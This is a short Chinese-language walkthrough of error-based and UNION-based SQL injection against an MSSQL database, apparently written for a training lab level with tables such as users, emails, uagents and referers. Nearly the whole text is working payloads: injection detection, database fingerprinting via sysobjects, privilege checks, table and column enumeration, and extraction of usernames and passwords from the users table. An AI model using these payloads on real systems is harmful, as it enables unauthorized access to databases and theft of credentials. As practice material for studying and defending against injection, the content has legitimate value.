步骤一:在第一关使用单引号判断是否存在注入,根据报错的回显可知数据类型为字符型
?id=1'
?id=1' --+
步骤二:可通过以下Payload来探测当前站点是否是MSSQL数据库,正常执行说明后台数据库是MSSQL;也可根据页面报错信息来判断数据库
'and exists(select *from sysobjects)--+
步骤三:查询数据库信息,user回显的dbo表示是最高权限,如果是用户的名字表示是普通权限
user:查询⽤户
db_name():查询数据库名
@@version:查询版本信息
' union select 1,user,is_srvrolemember('public'); --+
' union select 1,@@version ,is_srvrolemember('public'); --+
步骤四:通过以下语句来猜解有哪些表...从⽽获取⽬标站点的表信息
-1'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id)t order by id desc)=1 --+
-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users') --+
-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails') --+
-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents') --+
-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents' and name != 'referers') --+
返回结果为空说明里面没有表了
步骤五:通过语句爆出表下的所有字段信息
' having 1=1 --+
'group by id having 1=1--+
'group by id , username having 1=1--+
'group by id , username,password having 1=1--+
步骤六:爆字段值
1.查询字段数据
'order by 3 --+
回显正常
'order by 4 --+
回显错误
2.回显存在内容的字段
-1'union select 1,2,3 from users--+
3.查询字段内容
-1' union all select 1,(select top 1 username from users),'3'--+
-1' union all select 1,2,(select top 1 password from users)--+
1'union select 1,username,password from users--+